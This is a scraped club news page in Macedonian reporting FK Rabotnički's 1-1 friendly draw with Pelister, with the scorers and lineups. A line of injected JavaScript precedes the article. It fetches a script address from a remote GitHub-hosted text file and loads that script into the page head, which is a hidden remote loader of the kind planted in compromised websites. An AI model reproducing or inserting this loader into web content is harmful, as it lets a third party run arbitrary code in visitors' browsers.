;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ФК Работнички » Реми (1-1) против Пелистер за крај на охридската авантура
shopping-bag 0
Items : 0
Subtotal : 0 MKD
View Cart Check Out

Реми (1-1) против Пелистер за крај на охридската авантура

Работнички ремизираше на петтиот пријателски натпревар на зимските подготовки, последен пред враќањето на тимот во Скопје. На дуелот против Пелистер составот на Александар Влахо одигра 1-1. Поведе Пелистер со голот од пенал на Борче Маневски во 63.минута, а израмни Петар Петковски во 85.минута од мечот.

Во првиот дел, убава можност за Работнички имаше Ристовски, но не успеа да реализира, а Михаил Талевски на спротивната страна ја погоди гредата.

Во второто полувреме беше досуден пенал за Пелистер, а успешен реализатор беше Борче Маневски во 63.минута. Работнички имаше убави можности за израмнување преку Ристовски и Марио Станковски.

Пред крајот стигна израмнувањето преку Петар Петковски. На асистенција на Кристијан Стојкоски, крилниот напаѓач успеа да ја затресе мрежата на Пелистер во 85.минута.

Тренерот Александар Влахо на денешниот тест натпревар со Пелистер им даде шанса на следните фудбалери: Мустафа, Пецов, Мисердовски, Грозданоски, Зука, Јевтовски, Тодоровски, Лука Станковски, Максимов, Ристовски, Прелчец. Уште играа: Силјановски, Стојков, Ѓорѓевиќ, Стојкоски, Марио Станковски, Петковски, Лазаров, Ѓурѓевиќ.

По денешниот натпревар експедицијата на Работнички се враќа во Скопје каде ќе го одработи завршниот дел од подготовките во пресрет на пролетниот дел од првенството.